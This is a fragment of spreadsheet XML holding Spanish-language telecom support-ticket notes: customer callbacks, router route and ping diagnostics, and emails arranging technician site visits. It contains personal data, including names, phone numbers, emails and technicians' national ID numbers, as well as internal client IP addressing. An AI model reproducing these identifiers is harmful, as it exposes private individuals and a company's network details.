    <t>**SE LLAMA A CLIENTE JOSE CORADO AL 22259499 CONTESTA EL SEÑOR HIPOLITO Y SOLICITA QUE SE LE LLAME EN 15 MIN PARA CONFIRMAR ACCESOS CON EL SEÑOR JOSE**
-ID 1001673291
**</t>
  </si>
  <si>
    <t>F4612279</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE INFORMA QUE NO TIENE ENLACE, SE OBESRVA QUE ESTE PUNTO ESTA FUNCIONANDO CORRECTAMENTE, EL ENLACE AFECTADO ES LA CENTRAL, SE AGREGA A CALL CENTER PARA GENERAR INCIDENTE POR ENLACE CORRECTO 892000004T SD 1137728
PE: 10.179.28.32
&lt;CHMLGTCMN1T2C06B02EIM2&gt;DISP CURR | IN 10.174.199.180
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
IP ROUTE-STATIC VPN-INSTANCE KATO-KI 0.0.0.0 0.0.0.0 10.174.199.180 DESCRIPTION 892000004T
IP ROUTE-STATIC VPN-INSTANCE KATO-KI 10.212.203.60 255.255.255.255 10.174.199.180 DESCRIPTION MON_892000004T
IP ROUTE-STATIC VPN-INSTANCE KATO-KI 192.168.1.0 255.255.255.0 10.174.199.180 DESCRIPTION 892000004T
&lt;CHMLGTCMN1T2C06B02EIM2&gt;DISP IP ROUTIN VPN-INSTANCE KATO-KI 10.174.199.180
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : KATO-KI
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 10.174.199.176/28  DIRECT  0    0             D   10.174.199.177  VLANIF2478
&lt;CHMLGTCMN1T2C06B02EIM2&gt;
&lt;CHMLGTCMN1T2C06B02EIM2&gt;
&lt;CHMLGTCMN1T2C06B02EIM2&gt;
&lt;CHMLGTCMN1T2C06B02EIM2&gt;DISP CURR INT VLANIF2478
#
INTERFACE VLANIF2478
 DESCRIPTION KATO-KI
 IP BINDING VPN-INSTANCE KATO-KI
 IP ADDRESS 10.174.199.177 255.255.255.240
 ARP EXPIRE-TIME 300
 UNDO ICMP NAME HOST-UNREACHABLE RECEIVE
 UNDO ICMP NAME REDIRECT RECEIVE
#
RETURN
&lt;CHMLGTCMN1T2C06B02EIM2&gt;PING -VPN-INSTANCE KATO-KI 10.174.199.180
  PING 10.174.199.180: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.174.199.180 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
SE REVISO EN ESTE MOMENTO LA CENTRAL SE DETERMINO QUE LA CAUSA RAIZ FUE QUE FALTABA VLAN EN EL CHASIS DE LA REPISA CTC:
&lt;CHMLGTCMN1T2C06B02EIM2&gt;PING -C 3000 -S 1500 -M 30 -B  -VPN-INSTANCE KATO-KI 10.174.199.180
  PING 10.174.199.180: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.174.199.180 PING STATISTICS ---
    3000 PACKET(S) TRANSMITTED
    3000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/2/18 MS</t>
  </si>
  <si>
    <t>YA SE TIENE CONEXION DE PR A CENTRAL Y DE CENTRAL A PR, SE PROCEDE AL CIERRE DEL INCIDENTE, CLIENTE VALIDO. SRTA. MILVIA SIRIN
CC_COOPERATIVA_KATO_KI_GT_CHIMALTENANGO_PATZICIA#PING 192.168.1.1  SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 192.168.1.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 192.168.4.1
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/10/16 MS
CC_COOPERATIVA_KATO_KI_GT_CENTRAL_CHIMALTENANGO#PING 192.168.4.1  SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 192.168.4.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 192.168.1.88
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 8/12/24 MS</t>
  </si>
  <si>
    <t>F4612281</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGEL SANDOVAL AL 51379767 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001670195
**</t>
  </si>
  <si>
    <t>F4612285</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO  AL 47142401 INDICA QUE EL SERVICIO ESTA ESTABLE Y OPERATIVO**
-ID 1001683598
**</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A JULIO CHAJÓN/PR 47142401 PARA PRUEBAS; SE PIDE APOYO A CNOC CLARO VÍA SKYPE, SE LES LLAMÓ HASTA 3 VECES, NO CONTESTAN; TAMPOCO LO HACE KEVYN FONSECA/TEAM LEADER; SE ESCALA CON ÁNGEL CLAVEL, INDICA QUE NOS APOYARÁ CON GESTOR ASIGNADO. PR SE RETIRA A LAS 19:00 HORAS, SE LE INDICA QUE CNOC CLARO LE DEVOLVERÁ LLAMADA EN 5/10 MINUTOS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE 51089177  INDICA QUE NO ESTA EN AGENCIA QUE ESTA SUSPENDIDO SOLICITA QUE SE LE LLAME AL SEÑOR JULIO 47142401 SI NO LLEGARA A ENTENDER EL SI ES NECESARIO REALIZAR PRUEBAS INDICA QUE SE LE VUELVA A CONTACTAR **
-ID 1001670712
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO  AL 47142401 SOLICITA QUE SE LE LLAME EN 10 MIN YA QUE NO TIENE CONOCIMIENTO DEL REPORTE QUE EL ESTA CUBRIENDO INDICA QUE VERIFICARA **
-ID 1001674711
**</t>
  </si>
  <si>
    <t>F4612290</t>
  </si>
  <si>
    <t>**SE  LLAMA  A CLIENTE JUAN CARLOS TUCUBAL AL  50193647 NO RESPONDE SE INTENTARA LUEGO **
-ID 1001677096
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN CARLOS  50193647 Y COMUNICA AL SEÑOR  REIDIN ALVAREZ QUIEN SIGUE REPORTANDO PROBLEMAS CON LO DEL ANCHO DE BANDA || SE DEJA EN LINEA CON GESTOR**
-ID 1001842651
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS  50193647 MENCIONA QUE EL INCONVENIENTE ES QUE NO LLEGAN AL ANCHO DE BANDA CONTRATADO
CLIENTE INDICA QUE VA DE CAMINO A PR PERO SOLICITA SE PUEDA VALIDAR
-ID 1001786352</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS 50193647 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001727257</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAVEN ALVAREZ 22790909 PERO TAMPOCO RESPONDEN
-ID 1001727589</t>
  </si>
  <si>
    <t>F4612291</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CECILIA RODAS AL 47219658 INDICA QUE ESTA INESTABLE NO PUEDE REALIZAR LLAMADAS POR SKYPE AUN || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 1001677876
**</t>
  </si>
  <si>
    <t>F4612300</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIEL PAZ 54820346  MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001700875</t>
  </si>
  <si>
    <t>F4612301</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICK LOPEZ 42179010 MENCIONA QUE EL ID DE LA CENTRAL ERA 237400066
PERO CLIENTE MENCIONA QUE TIENEN SERVICIO EN LA CENTRAL CON OTRO PROVEEDOR
-ID 1001703410</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A ERICK LÓPEZ/CLIENTE, ASEGURA QUE ENLACE CAÍDO, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, SE LES LLAMÓ HASTA 3 VECES, NO CONTESTAN; NO SE TUVO APOYO DE ÉSTOS. SE LLAMÓ A LOS TEAMS LEADERS, NO CONTESTAN; SE ESCALÓ CON ÁNGEL CLAVEL VÍA TELÉFONO/SKYPE, INDICA QUE NOS APOYARÁ. CLIENTE SE RETIRA A LAS 17:00 HORAS, SE LE INDICA QUE GESTOR LE DEVOLVERÁ LLAMADA EN 5/10 MINUTOS.</t>
  </si>
  <si>
    <t>F4612345</t>
  </si>
  <si>
    <t>SELLAMA A CLIENTE  ANGEL RODRIGUEZ 25069510 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001706538</t>
  </si>
  <si>
    <t>F4612346</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IVONE CASTELLANOS 50004426  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001708338</t>
  </si>
  <si>
    <t>F4612371</t>
  </si>
  <si>
    <t>CLIENTE SOLICITA LA VISITA PARA MAÑANA JUEVES LAS 11 AM PARA REALIZAR PRUEBAS EN CONJUNTO CON PERSONAL TECNICO.</t>
  </si>
  <si>
    <t>F4612376</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE ANA AMBRIO 58932997 QUIEN VALIDA QUE EL E1 ESTÁ FUNCIONANDO CORRECTAMENTE, INDICA QUE EL SERVICIO PRESENTÓ INCONVENIENTE POR LA MAÑANA, SOLICITA SE VALIDE A LAS 17:00 HORAS. ID DE LLAMADA: 1001676593</t>
  </si>
  <si>
    <t>CLIENTE ANA AMBRINO 58932997 VALIDA QUE YA NO PRESENTÓ INCONVENIENTES EN EL E1, VALIDA EL E1 OPERATIVO, AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4612399</t>
  </si>
  <si>
    <t>NO SE LOGRA TENER COMUNICACION CON EL CLIENTE AL NUMERO: 46262461
1001950797
COLA:
NOMBRE: A: 46262461
NÚMERO: 55280199
DURACIÓN: 0:00:41
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 23/06/2022 16:39:46</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO // A LA ESPERA DE LA RESPUESA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 15:33
PARA: REG032.ASISTENTE@BANRURAL.COM.GT &lt;REG032.ASISTENTE@BANRURAL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 8902139T | MILVIA LOPEZ
BUENA TARDE ESTIMADO CLIENTE, UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO , GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO, ASÍ MISMO SOLICITAMOS DE SU APOYO INDICÁNDONOS FECHA Y HORA PARA REALIZAR LA VISITA.
DIRECCIÓN:  REDUNDANCIA  WIMAX  CALLE PRINCIPAL A DOS CUADRAS DEL PARQUE CENTRAL SAN IDELFONSO IXTAHUACAN HUEHUE
ADJUNTAMOS EL DATO DEL TÉCNICO.
737074 MARIO OTONIEL TARACENA RIOS 1683479461301 58261739
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>NO SE TIENE COMUNICACION AL OTRO CONTACTO : 46262509
1001951509
COLA:
NOMBRE: A: 46262509
NÚMERO: 55280199
DURACIÓN: 0:00:37
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 23/06/2022 16:41:28</t>
  </si>
  <si>
    <t>F4612406</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE
F4612406 / ID 90001911167T / GDN 79654242 / GRUPO EMPRESARIAL DE GUATEMALA, S.A._CASERIO ORIZABAL MALACATAN SAN MARCOS SAN MARCOS MALACATAN /
MONICA YIREH CASTILLO POON
BUENAS TARDES ESTIMADOS,
REFERENTE AL REPORTE DEL SERVICIO DE E1 79654242 A NOMBRE DE GRUPO EMPRESARIAL DE GUATEMALA, S.A., LE COMENTAMOS QUE YA SE HA REALIZADO EL DIAGNOSTICO EN DONDE SE OBSERVA QUE NO SE TIENE COMUNICACIÓN AL EQUIPO AETHRA. POR LO QUE SOLICITAMOS DE SU AMABLE APOYO CON UBICAR EL EQUIPO EN LAS INSTALACIONES Y PODER REINICIARLO DESCONECTÁNDOLO DEL TOMA CORRIENTE YA QUE POSIBLEMENTE SE ENCUENTRE BLOQUEADO. EL EQUIPO TIENE UN TAMAÑO GRANDE, DE COLOR GRIS Y AZUL.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS,</t>
  </si>
  <si>
    <t>SOLICITA QUE SE CONTACTE AL NUMERO 50161626
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON TEC BILLY JUAREZ 612059  58263500
##LLAMADA DESDES VIVO</t>
  </si>
  <si>
    <t>CLIENTE MARITZA MENDEZ 59861432 INDICA QUE YA NO SE ENCUENTRA EN EL SITIO, SOLICITA SE COORDINE UNA VISITA PARA MAÑANA A LAS 8 AM YA QUE NO CONOCE DE EQUIPOS Y NO PUEDE APOYAR A REINICIAR EL AETHRA. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARITZA MENDEZ AL 59861432 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001895453
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARITZA MENDEZ AL 59861432 INDICA QUE NO ESTA EN EL HOTEL SOLICITA QUE SE LE LLAME EN 5 MIN**
-ID 1001891335
**</t>
  </si>
  <si>
    <t>SE SOLICITA SU APOYO PARA VERIFICAR EQUIPOS EN EL CLIENTE, POSIBLEMENTE INHIBIDOS, CLIENTE NO APOYO CON PRUEBAS, FAVOR COORDINAR PARA MAÑANA 23/06 A LAS 8 AM
CLIENTE:  GRUPO EMPRESARIAL DE GUATEMALA, S.A._
DIRECCIÓN: CASERIO ORIZABAL MALACATAN SAN MARCOS DENTRO DEL HOTEL REAL PACÍFICO
FALLA:  F4612406
GDN:    	79654242
CONTACTO:  MARITZA MENDEZ 59861432
HORARIO: 8 A 5 PM
EQUIPO EN EL CLIENTE: CTC Y AETHRA
PERMISOS: NO NECESARIO TRAMITAR PERMISOS ESPECIALES
TIPO DE MEDIO: FIBRA
CENTRAL UM: UR MALACATAN</t>
  </si>
  <si>
    <t>DESPUES DE VARIOS INTENTOS NOS ENVIA A BUZON DIRECTO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MARITZA MENDEZ 59861432  PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE TRATA DE CONTACTAR A CLIENTE MARITZA MENDEZ 59861432 PERO NOS MANDA A BUZON, SE VALIDA COLA DE CORREOS PERO NO SE TIENE RESPUESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4612414</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR ZAMORA  57035857  MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001712345</t>
  </si>
  <si>
    <t>F4612444</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JOSE FUENTES 42187322 PERO NO RESPONDE, SE INENTARA LUEGO
-ID 1001936083</t>
  </si>
  <si>
    <t>F4612454</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA GESTIONAR LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 12:20
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; JONATAN GOMEZ &lt;JGOMEZ@QUATTRO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JERSON GUTIERREZ &lt;JGUTIERREZ@QUATTRO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: MISSION CONTROL &lt;MISSIONCONTROL@QUATTRO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAIDO GT-PRADERA
BUENA TARDE
       SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES  NECESARIAS.
EDGAR DANIEL GOMEZ MENDEZ
IBM - 589058
DPI - 1628 97243 1401
DANIEL ENRIQUE MONTENEGRO CARACUN  -
IBM - 659473
DPI - 2414 54425 01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BRINDAN AVANCES DEL TICKET A OMAR MARTÍNEZ/CLIENTE; SE LE INDICA QUE CLIENTE PR PARA PODER REALIZAR PRUEBAS DEBE TENER EL PERMISO DE CLIENTE CENTRAL; CENTRAL INDICA QUE CONTESTARÁ EL CORREO.</t>
  </si>
  <si>
    <t>F4612468</t>
  </si>
  <si>
    <t>SE LLAMA MONITOREO DE CAJERO 5B ATIENDE ANTONY GARCIA QUEN INDICA QUE TIENEN LLAMADA DE CONCILIACIÓN CON ENERGUATE DEBIDO A QUE TUVIERON INCONVENIENTES CON POSTE DE ENERGÍA, POR LO QUE SOLICITA QUE SE LLAMEN NUEVAMENTE A LAS 15:30 PARA VALIDAR SI EL PROBLEMA FUE RESUELTO O SI SE TIENE FECHA DE SOLUCIÓN POR PARTE DE ENERGUATE
1001881868
COLA:
NOMBRE: A: 24207210
NÚMERO: 24207210
DURACIÓN: 0:05:04
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207210
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 23/06/2022 12:57:40</t>
  </si>
  <si>
    <t>F4612474</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLARA DEL CARMEN LUNA 75811478 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001722521</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLARA DEL CARMEN LUNA 75811478 NO RESPONDE, SE INTENTARA LUEGO**
-ID 1001737988
**</t>
  </si>
  <si>
    <t>F4612476</t>
  </si>
  <si>
    <t>SE HABLÓ CON STEVEN MÁRQUEZ/CLIENTE 22437253 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001872193</t>
  </si>
  <si>
    <t>F4612494</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ERICK ESCOTO ID: 1001742846 NO CONTESTA IVR ENVIA A BUZON,</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR. ERICK ESCOTO 99924532 NO SE LOGRO COMUNICACION , IVR ENVIA A BUZON, ID: 1001737398.</t>
  </si>
  <si>
    <t>F4612553</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS PINEDA 58778927 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO PERO SOLICITA SE PUEDA ENVIAR RFO
ITSUPPORT@XENTURYGLOBAL.COM
-ID 1001788651</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 8:39
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; FRANCISCO EDUARDO QUEZADA GARCIA &lt;FRANCISCOED.QUEZADA@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || XENTURY GLOBAL S.A. || F4612553
BUEN DÍA
    SOLICITO DE SU APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA	ID 	TICKET
XENTURY GLOBAL S.A.
511300004T
SD1137715 - F4612553
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4612568</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 31377777 PERO NO RESPONDE,SE INTENTARA LUEGO
-ID 1001812076</t>
  </si>
  <si>
    <t>F4612583</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOHANA YAMILET 53021634 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001725185</t>
  </si>
  <si>
    <t>F4612600</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS AREVALO AL 30243468 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001847148
**</t>
  </si>
  <si>
    <t>-* CARLOS AREVALO 30243468 (CLIENTE) INFORMA QUE ESCALARON CON GERENCIA QUIENES LE ASIGNARON UN CONSULTOR, REALIZARON PRUEBAS Y LEVANTO EL SERVICIO, DE MOMENTO TODO OK, AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>F4612603</t>
  </si>
  <si>
    <t>SE LLAMA AACLIENTE JULIO GUTIERREZ-70719975  ## NO CONTESTA## SE INTARA NUEVAMENTE EN BREVE ##VIVO</t>
  </si>
  <si>
    <t>JULIO GUTIERREZ-70719975 ##SE TIENE EN LINEA ##
1001815022
COLA:
NOMBRE: A: 0050370719975
NÚMERO: 0050370719975
DURACIÓN: 0:00:48
ESTADO: CONECTADA
DETALLES: 0050370719975
PROCESO ASOCIADO:
